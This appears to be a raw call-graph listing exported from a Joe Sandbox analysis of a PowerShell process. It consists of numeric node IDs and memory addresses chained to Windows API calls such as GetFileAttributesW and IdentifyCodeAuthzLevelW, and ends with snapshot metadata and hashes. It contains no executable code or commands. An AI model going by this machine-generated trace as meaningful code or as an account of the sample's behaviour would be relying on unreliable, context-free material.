156147->156147 156148->156147 156149->156147 156150->156147 156151->156144 156152->156139 156153->156139 156154->156139 156155->156139 156156->156139 156157->156139 156158->156139 156159->156139 156160->156139 156161->156142 156162->156142 156163->156142 156164->156142 156166 82f9224 156165->156166 156168 82f9b38 GetFileAttributesW 156166->156168 156169 82fa181 GetFileAttributesW 156166->156169 156170 82f9e80 GetFileAttributesW 156166->156170 156167 82f9291 156168->156167 156169->156167 156170->156167 156172 87c1b61 156171->156172 156173 87c1bf6 156172->156173 156207 87c37e0 156172->156207 156213 87c37d1 156172->156213 156173->156030 156177 87c19b3 156176->156177 156178 87c1bf6 156177->156178 156179 87c37e0 GetFileAttributesW 156177->156179 156180 87c37d1 GetFileAttributesW 156177->156180 156178->156030 156179->156177 156180->156177 156183 87c1a97 156181->156183 156182 87c1bf6 156182->156030 156183->156182 156184 87c37e0 GetFileAttributesW 156183->156184 156185 87c37d1 GetFileAttributesW 156183->156185 156184->156183 156185->156183 156188 87c19df 156186->156188 156189 87c1c20 156186->156189 156187 87c1bf6 156187->156030 156188->156187 156190 87c37e0 GetFileAttributesW 156188->156190 156191 87c37d1 GetFileAttributesW 156188->156191 156189->156030 156190->156188 156191->156188 156194 82f9b3c 156192->156194 156193 82f9b4e 156193->156032 156193->156193 156194->156193 156227 82fc728 156194->156227 156233 82fc700 156194->156233 156198 82fa16c 156197->156198 156199 82f9f21 156197->156199 156199->156198 156200 82fc728 GetFileAttributesW 156199->156200 156201 82fc700 GetFileAttributesW 156199->156201 156200->156199 156201->156199 156204 82f9e84 156202->156204 156203 82fa16c 156203->156203 156204->156203 156205 82fc728 GetFileAttributesW 156204->156205 156206 82fc700 GetFileAttributesW 156204->156206 156205->156204 156206->156204 156210 87c37ed 156207->156210 156208 87c3809 156208->156172 156209 87c38e9 156210->156208 156219 87c3ab8 156210->156219 156223 87c3aa8 156210->156223 156215 87c37e0 156213->156215 156214 87c3809 156214->156172 156215->156214 156217 87c3ab8 GetFileAttributesW 156215->156217 156218 87c3aa8 GetFileAttributesW 156215->156218 156216 87c38e9 156217->156216 156218->156216 156220 87c3acc 156219->156220 156221 87c3b10 156220->156221 156222 34161f0 GetFileAttributesW 156220->156222 156221->156209 156222->156221 156225 87c3ab8 156223->156225 156224 87c3b10 156224->156209 156225->156224 156226 34161f0 GetFileAttributesW 156225->156226 156226->156224 156230 82fc72c 156227->156230 156228 82fcb83 156228->156194 156230->156228 156239 82fd441 156230->156239 156244 82fd450 156230->156244 156236 82fc704 156233->156236 156234 82fcb83 156234->156194 156235 82fcbc7 156235->156194 156236->156234 156237 82fd441 GetFileAttributesW 156236->156237 156238 82fd450 GetFileAttributesW 156236->156238 156237->156235 156238->156235 156240 82fd444 156239->156240 156241 82fd4b6 156240->156241 156242 87c19b8 GetFileAttributesW 156240->156242 156243 87c19a2 GetFileAttributesW 156240->156243 156241->156241 156242->156240 156243->156240 156245 82fd477 156244->156245 156246 82fd4b6 156245->156246 156247 87c19b8 GetFileAttributesW 156245->156247 156248 87c19a2 GetFileAttributesW 156245->156248 156246->156246 156247->156245 156248->156245 156249 8a10950 156250 8a1095c 156249->156250 156251 8a1097e 156249->156251 156250->156251 156252 8a10ff0 3 API calls 156250->156252 156253 8a11000 3 API calls 156250->156253 156252->156250 156253->156250 156254 8ac2f18 156255 8ac2f44 156254->156255 156256 8ac2f5b 156255->156256 156259 8ac2d58 156255->156259 156264 8ac2d48 156255->156264 156260 8ac2d7e 156259->156260 156269 8ac1edb 156260->156269 156275 8ac1ef0 156260->156275 156261 8ac2ec7 156261->156256 156265 8ac2d7e 156264->156265 156267 8ac1edb 3 API calls 156265->156267 156268 8ac1ef0 3 API calls 156265->156268 156266 8ac2ec7 156266->156256 156267->156266 156268->156266 156270 8ac1f06 156269->156270 156281 8ac1da9 156270->156281 156289 8ac1db8 156270->156289 156297 8ac1e8e 156270->156297 156271 8ac1f5d 156271->156261 156276 8ac1f06 156275->156276 156278 8ac1e8e 3 API calls 156276->156278 156279 8ac1db8 3 API calls 156276->156279 156280 8ac1da9 3 API calls 156276->156280 156277 8ac1f5d 156277->156261 156278->156277 156279->156277 156280->156277 156282 8ac1de9 156281->156282 156286 8ac1ec9 156282->156286 156305 8ac19c1 156282->156305 156311 8ac1aca 156282->156311 156317 8ac19d8 156282->156317 156323 8ac1af6 156282->156323 156329 8ac1bbd 156282->156329 156286->156271 156290 8ac1de9 156289->156290 156291 8ac1bbd 3 API calls 156290->156291 156292 8ac19d8 3 API calls 156290->156292 156293 8ac1aca 3 API calls 156290->156293 156294 8ac1ec9 156290->156294 156295 8ac1af6 3 API calls 156290->156295 156296 8ac19c1 3 API calls 156290->156296 156291->156294 156292->156294 156293->156294 156294->156271 156295->156294 156296->156294 156298 8ac1e99 156297->156298 156299 8ac1bbd 3 API calls 156298->156299 156300 8ac19d8 3 API calls 156298->156300 156301 8ac1aca 3 API calls 156298->156301 156302 8ac1ec9 156298->156302 156303 8ac1af6 3 API calls 156298->156303 156304 8ac19c1 3 API calls 156298->156304 156299->156302 156300->156302 156301->156302 156302->156271 156303->156302 156304->156302 156308 8ac1a0b 156305->156308 156306 8ac1d2b 156306->156286 156307 8ac1d9e 156307->156286 156308->156306 156335 8ac16d0 156308->156335 156340 8ac16ba 156308->156340 156314 8ac1acb 156311->156314 156312 8ac1d2b 156312->156286 156313 8ac1d9e 156313->156286 156314->156312 156315 8ac16ba 3 API calls 156314->156315 156316 8ac16d0 3 API calls 156314->156316 156315->156313 156316->156313 156320 8ac1a0b 156317->156320 156318 8ac1d2b 156318->156286 156319 8ac1d9e 156319->156286 156320->156318 156321 8ac16ba 3 API calls 156320->156321 156322 8ac16d0 3 API calls 156320->156322 156321->156319 156322->156319 156326 8ac1b02 156323->156326 156324 8ac1d2b 156324->156286 156325 8ac1d9e 156325->156286 156326->156324 156327 8ac16ba 3 API calls 156326->156327 156328 8ac16d0 3 API calls 156326->156328 156327->156325 156328->156325 156330 8ac1b02 156329->156330 156331 8ac1d2b 156330->156331 156333 8ac16ba 3 API calls 156330->156333 156334 8ac16d0 3 API calls 156330->156334 156331->156286 156332 8ac1d9e 156332->156286 156333->156332 156334->156332 156337 8ac1702 156335->156337 156336 8ac174a 156336->156307 156337->156336 156345 8ac0a07 156337->156345 156349 8ac0a70 156337->156349 156341 8ac16c5 156340->156341 156342 8ac174a 156341->156342 156343 8ac0a07 3 API calls 156341->156343 156344 8ac0a70 3 API calls 156341->156344 156342->156307 156343->156342 156344->156342 156346 8ac0a18 156345->156346 156347 8ac0a30 156346->156347 156348 897bbc6 3 API calls 156346->156348 156347->156336 156348->156347 156350 8ac0a23 156349->156350 156351 8ac0a73 156349->156351 156353 897bbc6 3 API calls 156350->156353 156351->156336 156352 8ac0a30 156352->156336 156353->156352 155466 8adff78 155471 8acd4e0 155466->155471 155491 8acdcbe 155466->155491 155506 8acd49c 155466->155506 155467 8adffa5 155485 88673a8 GetFileAttributesW 155471->155485 155486 88673b8 GetFileAttributesW 155471->155486 155472 8acd516 155477 8acd51a 155472->155477 155478 8acd871 155472->155478 155527 8ac8a71 155472->155527 155537 8ac8a80 155472->155537 155473 8ace43e 155479 8ac8a80 IdentifyCodeAuthzLevelW 155473->155479 155480 8ac8a71 IdentifyCodeAuthzLevelW 155473->155480 155474 8ace453 155547 8ac8978 155474->155547 155565 8ac8969 155474->155565 155475 8ace618 155475->155477 155483 8ac8a80 IdentifyCodeAuthzLevelW 155475->155483 155484 8ac8a71 IdentifyCodeAuthzLevelW 155475->155484 155476 8aceba8 155476->155477 155584 8ac7ee0 155476->155584 155588 8ac7ed0 155476->155588 155477->155467 155478->155473 155478->155475 155478->155477 155479->155474 155480->155474 155483->155476 155484->155476 155485->155472 155486->155472 155497 8acdccd 155491->155497 155492 8ace43e 155502 8ac8a80 IdentifyCodeAuthzLevelW 155492->155502 155503 8ac8a71 IdentifyCodeAuthzLevelW 155492->155503 155493 8ace453 155498 8ac8978 2 API calls 155493->155498 155499 8ac8969 2 API calls 155493->155499 155494 8ace618 155496 8acdd9b 155494->155496 155504 8ac8a80 IdentifyCodeAuthzLevelW 155494->155504 155505 8ac8a71 IdentifyCodeAuthzLevelW 155494->155505 155495 8aceba8 155495->155496 155500 8ac7ee0 IdentifyCodeAuthzLevelW 155495->155500 155501 8ac7ed0 IdentifyCodeAuthzLevelW 155495->155501 155497->155492 155497->155494 155497->155496 155498->155496 155499->155496 155500->155496 155501->155496 155502->155493 155503->155493 155504->155495 155505->155495 155507 8acd4a8 155506->155507 155519 88673a8 GetFileAttributesW 155507->155519 155520 88673b8 GetFileAttributesW 155507->155520 155508 8acd516 155513 8acd871 155508->155513 155514 8acd51a 155508->155514 155523 8ac8a80 IdentifyCodeAuthzLevelW 155508->155523 155524 8ac8a71 IdentifyCodeAuthzLevelW 155508->155524 155509 8ace43e 155521 8ac8a80 IdentifyCodeAuthzLevelW 155509->155521 155522 8ac8a71 IdentifyCodeAuthzLevelW 155509->155522 155510 8ace453 155515 8ac8978 2 API calls 155510->155515 155516 8ac8969 2 API calls 155510->155516 155511 8ace618 155511->155514 155517 8ac8a80 IdentifyCodeAuthzLevelW 155511->155517 155518 8ac8a71 IdentifyCodeAuthzLevelW 155511->155518 155512 8aceba8 155512->155514 155525 8ac7ee0 IdentifyCodeAuthzLevelW 155512->155525 155526 8ac7ed0 IdentifyCodeAuthzLevelW 155512->155526 155513->155509 155513->155511 155513->155514 155514->155467 155515->155514 155516->155514 155517->155512 155518->155512 155519->155508 155520->155508 155521->155510 155522->155510 155523->155513 155524->155513 155525->155514 155526->155514 155528 8ac8a80 155527->155528 155529 8ac8ac9 155528->155529 155531 8ac8af9 155528->155531 155592 8ac8a10 155529->155592 155596 8ac8a20 155529->155596 155530 8ac8af2 155530->155478 155535 8ac8a80 IdentifyCodeAuthzLevelW 155531->155535 155536 8ac8a71 IdentifyCodeAuthzLevelW 155531->155536 155532 8ac8b66 155532->155478 155535->155532 155536->155532 155538 8ac8a9b 155537->155538 155539 8ac8ac9 155538->155539 155541 8ac8af9 155538->155541 155543 8ac8a20 IdentifyCodeAuthzLevelW 155539->155543 155544 8ac8a10 IdentifyCodeAuthzLevelW 155539->155544 155540 8ac8af2 155540->155478 155545 8ac8a80 IdentifyCodeAuthzLevelW 155541->155545 155546 8ac8a71 IdentifyCodeAuthzLevelW 155541->155546 155542 8ac8b66 155542->155478 155543->155540 155544->155540 155545->155542 155546->155542 155660 8ac88d0 155547->155660 155672 8ac88c0 155547->155672 155548 8ac89b3 155549 8ac89b7 155548->155549 155684 8ad34b2 155548->155684 155695 8ad7984 155548->155695 155700 8ad5065 155548->155700 155705 8ad4e71 155548->155705 155713 8ad4d87 155548->155713 155721 8ad28c8 155548->155721 155732 8ad4b1c 155548->155732 155743 8ad6e1a 155548->155743 155748 8ad28d8 155548->155748 155759 8ad34cc 155548->155759 155770 8ad514e 155548->155770 155775 8ad34bf 155548->155775 155549->155477 155550 8ac8a04 155550->155477 155566 8ac8978 155565->155566 155582 8ac88c0 2 API calls 155566->155582 155583 8ac88d0 2 API calls 155566->155583 155567 8ac89b3 155568 8ac89b7 155567->155568 155570 8ad34cc GetFileAttributesW 155567->155570 155571 8ad4b1c GetFileAttributesW 155567->155571 155572 8ad34bf GetFileAttributesW 155567->155572 155573 8ad514e GetFileAttributesW 155567->155573 155574 8ad28c8 GetFileAttributesW 155567->155574 155575 8ad28d8 GetFileAttributesW 155567->155575 155576 8ad6e1a 2 API calls 155567->155576 155577 8ad5065 GetFileAttributesW 155567->155577 155578 8ad7984 2 API calls 155567->155578 155579 8ad4d87 GetFileAttributesW 155567->155579 155580 8ad4e71 GetFileAttributesW 155567->155580 155581 8ad34b2 GetFileAttributesW 155567->155581 155568->155477 155569 8ac8a04 155569->155477 155570->155569 155571->155569 155572->155569 155573->155569 155574->155569 155575->155569 155576->155569 155577->155569 155578->155569 155579->155569 155580->155569 155581->155569 155582->155567 155583->155567 155585 8ac7f05 155584->155585 155586 8ac7f7c 155584->155586 155587 341c607 IdentifyCodeAuthzLevelW 155585->155587 155586->155477 155587->155586 155589 8ac7f05 155588->155589 155590 8ac7f7c 155588->155590 155591 341c607 IdentifyCodeAuthzLevelW 155589->155591 155590->155477 155591->155590 155593 8ac8a20 155592->155593 155599 341c607 155593->155599 155598 341c607 IdentifyCodeAuthzLevelW 155596->155598 155597 8ac8a2c 155597->155530 155598->155597 155600 341c60f 155599->155600 155601 341c6b7 155600->155601 155604 341c810 155600->155604 155611 341c820 155600->155611 155601->155530 155605 341c81f 155604->155605 155606 341c83b 155604->155606 155605->155606 155618 341d1c3 155605->155618 155623 341d037 155605->155623 155629 341d195 155605->155629 155634 341d1ac 155605->155634 155606->155601 155612 341c834 155611->155612 155613 341d1c3 IdentifyCodeAuthzLevelW 155612->155613 155614 341d195 IdentifyCodeAuthzLevelW 155612->155614 155615 341d037 IdentifyCodeAuthzLevelW 155612->155615 155616 341c83b 155612->155616 155617 341d1ac IdentifyCodeAuthzLevelW 155612->155617 155613->155616 155614->155616 155615->155616 155616->155601 155617->155616 155619 341d112 155618->155619 155639 341e4f0 155619->155639 155643 341e4c0 155619->155643 155624 341d04d 155623->155624 155625 341d0df 155624->155625 155627 341e4c0 IdentifyCodeAuthzLevelW 155624->155627 155628 341e4f0 IdentifyCodeAuthzLevelW 155624->155628 155625->155606 155626 341d243 155627->155626 155628->155626 155631 341d112 155629->155631 155630 341d243 155630->155630 155632 341e4c0 IdentifyCodeAuthzLevelW 155631->155632 155633 341e4f0 IdentifyCodeAuthzLevelW 155631->155633 155632->155630 155633->155630 155636 341d112 155634->155636 155635 341d243 155635->155635 155637 341e4c0 IdentifyCodeAuthzLevelW 155636->155637 155638 341e4f0 IdentifyCodeAuthzLevelW 155636->155638 155637->155635 155638->155635 155648 341e520 155639->155648 155652 341e510 155639->155652 155644 341e4c5 155643->155644 155646 341e510 IdentifyCodeAuthzLevelW 155644->155646 155647 341e520 IdentifyCodeAuthzLevelW 155644->155647 155645 341d243 155646->155645 155647->155645 155649 341e558 155648->155649 155656 341da6c 155649->155656 155651 341e594 155653 341e558 155652->155653 155654 341da6c IdentifyCodeAuthzLevelW 155653->155654 155655 341e594 155654->155655 155657 341ed58 IdentifyCodeAuthzLevelW 155656->155657 155659 341ee7f 155657->155659 155661 8ac88ee 155660->155661 155786 8ac82f0 155661->155786 155794 8ac8300 155661->155794 155662 8ac8904 155663 8ac8914 155662->155663 155801 8ada1d8 155662->155801 155806 8ada1e8 155662->155806 155663->155548 155664 8ac8928 155665 8ac8942 155664->155665 155668 8ac82f0 2 API calls 155664->155668 155669 8ac8300 2 API calls 155664->155669 155665->155548 155668->155665 155669->155665 155673 8ac88d0 155672->155673 155680 8ac82f0 2 API calls 155673->155680 155681 8ac8300 2 API calls 155673->155681 155674 8ac8904 155675 8ac8914 155674->155675 155682 8ada1e8 GetFileAttributesW 155674->155682 155683 8ada1d8 GetFileAttributesW 155674->155683 155675->155548 155676 8ac8928 155677 8ac8942 155676->155677 155678 8ac82f0 2 API calls 155676->155678 155679 8ac8300 2 API calls 155676->155679 155677->155548 155678->155677 155679->155677 155680->155674 155681->155674 155682->155676 155683->155676 155687 8ad34bd 155684->155687 155685 8ad367a 155685->155550 155686 8ad4e56 155686->155685 155693 8ad09a0 GetFileAttributesW 155686->155693 155694 8ad0990 GetFileAttributesW 155686->155694 155687->155685 155897 8ad0990 155687->155897 155902 8ad09a0 155687->155902 155688 8ad4aee 155688->155685 155691 8ad09a0 GetFileAttributesW 155688->155691 155692 8ad0990 GetFileAttributesW 155688->155692 155691->155686 155692->155686 155693->155685 155694->155685 155696 8ad798e 155695->155696 155697 8ad8067 155695->155697 155696->155697 155907 8acf520 155696->155907 155916 8acf530 155696->155916 155697->155550 155701 8ad4ebb 155700->155701 155702 8ad5147 155701->155702 155703 8ad09a0 GetFileAttributesW 155701->155703 155704 8ad0990 GetFileAttributesW 155701->155704 155702->155550 155703->155702 155704->155702 155706 8ad4e23 155705->155706 155707 8ad4e6a 155705->155707 155711 8ad09a0 GetFileAttributesW 155706->155711 155712 8ad0990 GetFileAttributesW 155706->155712 155707->155550 155708 8ad4e56 155708->155707 155709 8ad09a0 GetFileAttributesW 155708->155709 155710 8ad0990 GetFileAttributesW 155708->155710 155709->155707 155710->155707 155711->155708 155712->155708 155715 8ad4b5f 155713->155715 155714 8ad4e56 155716 8ad4e6a 155714->155716 155717 8ad09a0 GetFileAttributesW 155714->155717 155718 8ad0990 GetFileAttributesW 155714->155718 155719 8ad09a0 GetFileAttributesW 155715->155719 155720 8ad0990 GetFileAttributesW 155715->155720 155716->155550 155717->155716 155718->155716 155719->155714 155720->155714 155722 8ad293e 155721->155722 155725 8ad29eb 155722->155725 155726 8ad09a0 GetFileAttributesW 155722->155726 155727 8ad0990 GetFileAttributesW 155722->155727 155723 8ad4e56 155723->155725 155730 8ad09a0 GetFileAttributesW 155723->155730 155731 8ad0990 GetFileAttributesW 155723->155731 155724 8ad4aee 155724->155725 155728 8ad09a0 GetFileAttributesW 155724->155728 155729 8ad0990 GetFileAttributesW 155724->155729 155725->155550 155726->155724 155727->155724 155728->155723 155729->155723 155730->155725 155731->155725 155733 8ad4abb 155732->155733 155735 8ad4b02 155732->155735 155737 8ad09a0 GetFileAttributesW 155733->155737 155738 8ad0990 GetFileAttributesW 155733->155738 155734 8ad4aee 155734->155735 155739 8ad09a0 GetFileAttributesW 155734->155739 155740 8ad0990 GetFileAttributesW 155734->155740 155735->155550 155736 8ad4e56 155736->155735 155741 8ad09a0 GetFileAttributesW 155736->155741 155742 8ad0990 GetFileAttributesW 155736->155742 155737->155734 155738->155734 155739->155736 155740->155736 155741->155735 155742->155735 155745 8ad6d70 155743->155745 155744 8ad754a 155745->155743 155745->155744 155746 8acf520 2 API calls 155745->155746 155747 8acf530 2 API calls 155745->155747 155746->155745 155747->155745 155749 8ad293e 155748->155749 155752 8ad29eb 155749->155752 155755 8ad09a0 GetFileAttributesW 155749->155755 155756 8ad0990 GetFileAttributesW 155749->155756 155750 8ad4e56 155750->155752 155753 8ad09a0 GetFileAttributesW 155750->155753 155754 8ad0990 GetFileAttributesW 155750->155754 155751 8ad4aee 155751->155752 155757 8ad09a0 GetFileAttributesW 155751->155757 155758 8ad0990 GetFileAttributesW 155751->155758 155752->155550 155753->155752 155754->155752 155755->155751 155756->155751 155757->155750 155758->155750 155760 8ad34d7 155759->155760 155763 8ad367a 155760->155763 155764 8ad09a0 GetFileAttributesW 155760->155764 155765 8ad0990 GetFileAttributesW 155760->155765 155761 8ad4e56 155761->155763 155768 8ad09a0 GetFileAttributesW 155761->155768 155769 8ad0990 GetFileAttributesW 155761->155769 155762 8ad4aee 155762->155763 155766 8ad09a0 GetFileAttributesW 155762->155766 155767 8ad0990 GetFileAttributesW 155762->155767 155763->155550 155764->155762 155765->155762 155766->155761 155767->155761 155768->155763 155769->155763 155771 8ad5100 155770->155771 155772 8ad5147 155770->155772 155771->155772 155773 8ad09a0 GetFileAttributesW 155771->155773 155774 8ad0990 GetFileAttributesW 155771->155774 155772->155550 155773->155772 155774->155772 155776 8ad34ca 155775->155776 155779 8ad367a 155776->155779 155784 8ad09a0 GetFileAttributesW 155776->155784 155785 8ad0990 GetFileAttributesW 155776->155785 155777 8ad4e56 155777->155779 155782 8ad09a0 GetFileAttributesW 155777->155782 155783 8ad0990 GetFileAttributesW 155777->155783 155778 8ad4aee 155778->155779 155780 8ad09a0 GetFileAttributesW 155778->155780 155781 8ad0990 GetFileAttributesW 155778->155781 155779->155550 155780->155777 155781->155777 155782->155779 155783->155779 155784->155778 155785->155778 155787 8ac8300 155786->155787 155811 8ac8268 155787->155811 155816 8ac8259 155787->155816 155788 8ac8329 155821 8ac6e48 155788->155821 155830 8ac6e58 155788->155830 155789 8ac833e 155789->155662 155799 8ac8268 IdentifyCodeAuthzLevelW 155794->155799 155800 8ac8259 IdentifyCodeAuthzLevelW 155794->155800 155795 8ac8329 155797 8ac6e48 GetFileAttributesW 155795->155797 155798 8ac6e58 GetFileAttributesW 155795->155798 155796 8ac833e 155796->155662 155797->155796 155798->155796 155799->155795 155800->155795 155803 8ada1e8 155801->155803 155802 8ada292 155802->155664 155803->155802 155804 88673a8 GetFileAttributesW 155803->155804 155805 88673b8 GetFileAttributesW 155803->155805 155804->155803 155805->155803 155808 8ada1fa 155806->155808 155807 8ada292 155807->155664 155808->155807 155809 88673a8 GetFileAttributesW 155808->155809 155810 88673b8 GetFileAttributesW 155808->155810 155809->155808 155810->155808 155812 8ac82bb 155811->155812 155813 8ac8277 155811->155813 155812->155788 155813->155812 155814 8ac7ee0 IdentifyCodeAuthzLevelW 155813->155814 155815 8ac7ed0 IdentifyCodeAuthzLevelW 155813->155815 155814->155812 155815->155812 155817 8ac8268 155816->155817 155818 8ac82bb 155817->155818 155819 8ac7ee0 IdentifyCodeAuthzLevelW 155817->155819 155820 8ac7ed0 IdentifyCodeAuthzLevelW 155817->155820 155818->155788 155819->155818 155820->155818 155823 8ac6e70 155821->155823 155822 8ac6fa5 155822->155789 155823->155822 155828 8ac6e48 GetFileAttributesW 155823->155828 155829 8ac6e58 GetFileAttributesW 155823->155829 155824 8ac7051 155839 8ac6a00 155824->155839 155844 8ac69f1 155824->155844 155825 8ac71db 155828->155824 155829->155824 155832 8ac6e70 155830->155832 155831 8ac6fa5 155831->155789 155832->155831 155835 8ac6e48 GetFileAttributesW 155832->155835 155836 8ac6e58 GetFileAttributesW 155832->155836 155833 8ac7051 155837 8ac6a00 GetFileAttributesW 155833->155837 155838 8ac69f1 GetFileAttributesW 155833->155838 155834 8ac71db 155835->155833 155836->155833 155837->155834 155838->155834 155840 8ac6a18 155839->155840 155849 8ac6978 155840->155849 155854 8ac6969 155840->155854 155841 8ac6a31 155841->155825 155845 8ac6a18 155844->155845 155847 8ac6978 GetFileAttributesW 155845->155847 155848 8ac6969 GetFileAttributesW 155845->155848 155846 8ac6a31 155846->155825 155847->155846 155848->155846 155850 8ac698c 155849->155850 155859 8ac66bc 155850->155859 155863 8ac66d0 155850->155863 155851 8ac69e0 155851->155841 155855 8ac6978 155854->155855 155857 8ac66bc GetFileAttributesW 155855->155857 155858 8ac66d0 GetFileAttributesW 155855->155858 155856 8ac69e0 155856->155841 155857->155856 155858->155856 155860 8ac66d0 155859->155860 155861 8ac6790 155860->155861 155867 8ac6692 155860->155867 155861->155851 155864 8ac66f8 155863->155864 155865 8ac6790 155864->155865 155866 8ac6692 GetFileAttributesW 155864->155866 155865->155851 155866->155865 155868 8ac6698 155867->155868 155869 8ac66a3 155867->155869 155873 8ac5990 155868->155873 155883 8ac59a0 155868->155883 155893 8ac6578 155868->155893 155869->155861 155874 8ac59ae 155873->155874 155875 8ac5adb 155874->155875 155876 8ac6539 155874->155876 155877 8ac59b2 155874->155877 155881 8ac5808 GetFileAttributesW 155875->155881 155882 8ac57f2 GetFileAttributesW 155875->155882 155878 8ac65d6 155876->155878 155879 8ac59a0 GetFileAttributesW 155876->155879 155880 8ac5990 GetFileAttributesW 155876->155880 155877->155869 155878->155869 155879->155878 155880->155878 155881->155877 155882->155877 155884 8ac59ae 155883->155884 155885 8ac5adb 155884->155885 155886 8ac6539 155884->155886 155887 8ac59b2 155884->155887 155891 8ac5808 GetFileAttributesW 155885->155891 155892 8ac57f2 GetFileAttributesW 155885->155892 155888 8ac65d6 155886->155888 155889 8ac59a0 GetFileAttributesW 155886->155889 155890 8ac5990 GetFileAttributesW 155886->155890 155887->155869 155888->155869 155889->155888 155890->155888 155891->155887 155892->155887 155894 8ac65d6 155893->155894 155895 8ac59a0 GetFileAttributesW 155893->155895 155896 8ac5990 GetFileAttributesW 155893->155896 155894->155869 155895->155894 155896->155894 155898 8ad09a0 155897->155898 155899 8ad09e3 155898->155899 155900 88673a8 GetFileAttributesW 155898->155900 155901 88673b8 GetFileAttributesW 155898->155901 155899->155688 155900->155898 155901->155898 155903 8ad09df 155902->155903 155904 8ad09e3 155903->155904 155905 88673a8 GetFileAttributesW 155903->155905 155906 88673b8 GetFileAttributesW 155903->155906 155904->155688 155905->155903 155906->155903 155908 8acf530 155907->155908 155909 8acf82c 155908->155909 155910 8acf6de 155908->155910 155911 8acd49c 2 API calls 155908->155911 155912 8acdcbe 2 API calls 155908->155912 155913 8acd4e0 2 API calls 155908->155913 155909->155910 155914 8acd49c 2 API calls 155909->155914 155915 8acd4e0 2 API calls 155909->155915 155911->155909 155912->155909 155913->155909 155914->155910 155915->155910 155917 8acf5d5 155916->155917 155918 8acf82c 155917->155918 155919 8acf6de 155917->155919 155922 8acd49c 2 API calls 155917->155922 155923 8acdcbe 2 API calls 155917->155923 155924 8acd4e0 2 API calls 155917->155924 155918->155919 155920 8acd49c 2 API calls 155918->155920 155921 8acd4e0 2 API calls 155918->155921 155920->155919 155921->155919 155922->155918 155923->155918 155924->155918 156354 8866f30 156355 8866fcf 156354->156355 156356 8866f59 156354->156356 156356->156355 156357 886d461 GetFileAttributesW 156356->156357 156358 886d57c GetFileAttributesW 156356->156358 156357->156355 156358->156355 155925 8977f00 155926 8977f34 155925->155926 155927 8977f6b 155926->155927 155932 89771d0 155926->155932 155937 89771c0 155926->155937 155928 89783db 155927->155928 155929 897b25c 3 API calls 155927->155929 155929->155928 155933 89771fd 155932->155933 155942 8977100 155933->155942 155946 89770f1 155933->155946 155934 8977215 155934->155934 155938 89771d0 155937->155938 155940 89770f1 IdentifyCodeAuthzLevelW 155938->155940 155941 8977100 IdentifyCodeAuthzLevelW 155938->155941 155939 8977215 155939->155939 155940->155939 155941->155939 155943 8977129 155942->155943 155944 8977157 155942->155944 155943->155944 155945 341c607 IdentifyCodeAuthzLevelW 155943->155945 155944->155934 155945->155944 155947 8977157 155946->155947 155948 8977129 155946->155948 155947->155934 155948->155947 155949 341c607 IdentifyCodeAuthzLevelW 155948->155949 155949->155947 156359 82f2cd8 156361 886e5c0 GetFileAttributesW 156359->156361 156362 886e5b1 GetFileAttributesW 156359->156362 156360 82f2ce6 156361->156360 156362->156360 156363 82f6dd8 156364 82f6df9 156363->156364 156367 82f6ed8 156363->156367 156372 82f6ec8 156363->156372 156369 82f6edc 156367->156369 156368 82f6fad 156369->156368 156377 82f7028 156369->156377 156382 82f7018 156369->156382 156374 82f6ed0 156372->156374 156373 82f6fad 156373->156373 156374->156373 156375 82f7028 GetFileAttributesW 156374->156375 156376 82f7018 GetFileAttributesW 156374->156376 156375->156374 156376->156374 156378 82f702c 156377->156378 156387 82f7489 156378->156387 156395 82f7498 156378->156395 156379 82f704c 156379->156369 156383 82f701c 156382->156383 156385 82f7489 GetFileAttributesW 156383->156385 156386 82f7498 GetFileAttributesW 156383->156386 156384 82f704c 156384->156369 156385->156384 156386->156384 156388 82f748c 156387->156388 156390 82f8d7d GetFileAttributesW 156388->156390 156391 82f8c39 GetFileAttributesW 156388->156391 156392 82f8c48 GetFileAttributesW 156388->156392 156393 82f8cc8 GetFileAttributesW 156388->156393 156394 82f8e10 GetFileAttributesW 156388->156394 156389 82f7515 156389->156379 156390->156389 156391->156389 156392->156389 156393->156389 156394->156389 156396 82f749c 156395->156396 156398 82f8d7d GetFileAttributesW 156396->156398 156399 82f8c39 GetFileAttributesW 156396->156399 156400 82f8c48 GetFileAttributesW 156396->156400 156401 82f8cc8 GetFileAttributesW 156396->156401 156402 82f8e10 GetFileAttributesW 156396->156402 156397 82f7515 156397->156379 156398->156397 156399->156397 156400->156397 156401->156397 156402->156397 155950 8ac92f0 155952 8ac931a 155950->155952 155951 8ac94ae 155952->155951 155955 8ac8be9 155952->155955 155963 8ac8bf8 155952->155963 155956 8ac8bf8 155955->155956 155958 8ac8c34 155956->155958 155959 8ac8a80 IdentifyCodeAuthzLevelW 155956->155959 155960 8ac8a71 IdentifyCodeAuthzLevelW 155956->155960 155957 8ac8cd5 155961 8ac8978 2 API calls 155957->155961 155962 8ac8969 2 API calls 155957->155962 155958->155952 155959->155957 155960->155957 155961->155958 155962->155958 155964 8ac8c30 155963->155964 155966 8ac8c34 155964->155966 155967 8ac8a80 IdentifyCodeAuthzLevelW 155964->155967 155968 8ac8a71 IdentifyCodeAuthzLevelW 155964->155968 155965 8ac8cd5 155969 8ac8978 2 API calls 155965->155969 155970 8ac8969 2 API calls 155965->155970 155966->155952 155967->155965 155968->155965 155969->155966 155970->155966 156403 82f67d0 156405 82f67e4 156403->156405 156404 82f68fd 156405->156404 156409 82f6e38 156405->156409 156413 82f6e48 156405->156413 156406 82f6dd6 156410 82f6e3c 156409->156410 156417 82f8094 156410->156417 156414 82f6e64 156413->156414 156416 82f8094 GetFileAttributesW 156414->156416 156415 82f6e9c 156415->156406 156416->156415 156418 82f80a0 156417->156418 156419 82f6e9c 156418->156419 156420 82f8c39 GetFileAttributesW 156418->156420 156421 82f8c48 GetFileAttributesW 156418->156421 156419->156406 156420->156419 156421->156419
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001E.00000002.2362637232.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_30_2_8ac0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 26bda929618bfbdba83cc2f8412ef3f2a15d654da66b6cdaccff42ce6361640a
                                                                                                                                                                                • Instruction ID: d6cca510b79502cfa235eb836b0dab42429237fe53bc770b1c044bb4a5bad7b0
                                                                                                                                                                                • Opcode Fuzzy Hash: 26bda929618bfbdba83cc2f8412ef3f2a15d654da66b6cdaccff42ce6361640a
